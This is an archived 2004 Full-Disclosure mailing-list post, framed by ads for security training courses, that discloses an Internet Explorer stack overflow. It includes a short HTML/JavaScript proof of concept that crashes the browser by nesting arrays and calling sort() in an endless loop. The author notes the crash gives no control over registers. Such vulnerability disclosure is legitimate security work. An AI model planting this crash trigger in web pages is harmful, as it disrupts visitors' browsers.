Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow ex

from [Berend-Jan Wever] Network Security [Permanent Link]
Subject: [Full-Disclosure] MSIE flaws: nested array sort() loop Stack overflow exception
Date: Thu, 25 Nov 2004 01:41:20 +0100 
Hi all,

Another flaw in IE:

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

Normally I would see if it's exploitable but I figure I'm not MS's pet bug 
finder/analyser... So, I've CC'ed this message to Microsoft. I'm sure they know 
their own product better then I do and can analyse the problem much faster. So 
if you want to know the impact of this vulnerability, ask them: I'm sure they 
will be more then willing to help you. I'm sure they will even reply to this 
message with technical details and a patch tomorrow.

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_ie_flaws.html

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

PS. Don't think firefox will keep you save from hackers, I _know_ it won't ;) 
But more on that later...
PS2. Recursive function call will cause stack overflow causing write exception 
in guard page on a push, no control over registers.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [SIG^2 G-TEC] CMailServer WebMail v5.2 Multiple Vulnerabilities, chewkeong
Next by Date:  [Full-Disclosure] [ GLSA 200411-34 ] Cyrus IMAP Server: Multiple remote vulnerabilities, Thierry Carrez
Previous by Thread:  [SIG^2 G-TEC] CMailServer WebMail v5.2 Multiple Vulnerabilities, chewkeong
Next by Thread:  [Full-Disclosure] Re: MSIE flaws: nested array sort() loop Stack overflow exception, Gadi Evron
Indexes:  [Date] [Thread] [Top] [All Lists]